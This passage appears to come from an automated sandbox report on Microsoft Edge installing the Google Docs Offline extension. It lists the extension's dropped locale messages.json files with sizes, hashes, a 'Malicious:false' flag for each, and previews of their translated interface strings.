                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):937
                                                                                                                                                                                                                                                                          Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                          MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                          SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                          SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                          SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1337
                                                                                                                                                                                                                                                                          Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                          MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                          SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                          SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                          SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2846
                                                                                                                                                                                                                                                                          Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                          MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                          SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                          SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                          SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):934
                                                                                                                                                                                                                                                                          Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                          MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                          SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                          SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                          SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):963
                                                                                                                                                                                                                                                                          Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                          MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                          SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                          SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                          SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1320
                                                                                                                                                                                                                                                                          Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                          MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                          SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                          SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                          SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):884
                                                                                                                                                                                                                                                                          Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                          MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                          SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                          SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                          SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):980
                                                                                                                                                                                                                                                                          Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                          MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                          SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                          SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                          SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1941
                                                                                                                                                                                                                                                                          Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                          MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                          SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                          SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                          SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1969
                                                                                                                                                                                                                                                                          Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                          MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                          SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                          SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                          SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1674
                                                                                                                                                                                                                                                                          Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                          MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                          SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                          SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                          SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1063
                                                                                                                                                                                                                                                                          Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                          MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                          SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                          SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                          SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1333
                                                                                                                                                                                                                                                                          Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                          MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                          SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                          SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                          SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1263
                                                                                                                                                                                                                                                                          Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                          MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                          SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                          SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                          SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1074
                                                                                                                                                                                                                                                                          Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                          MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                          SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                          SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
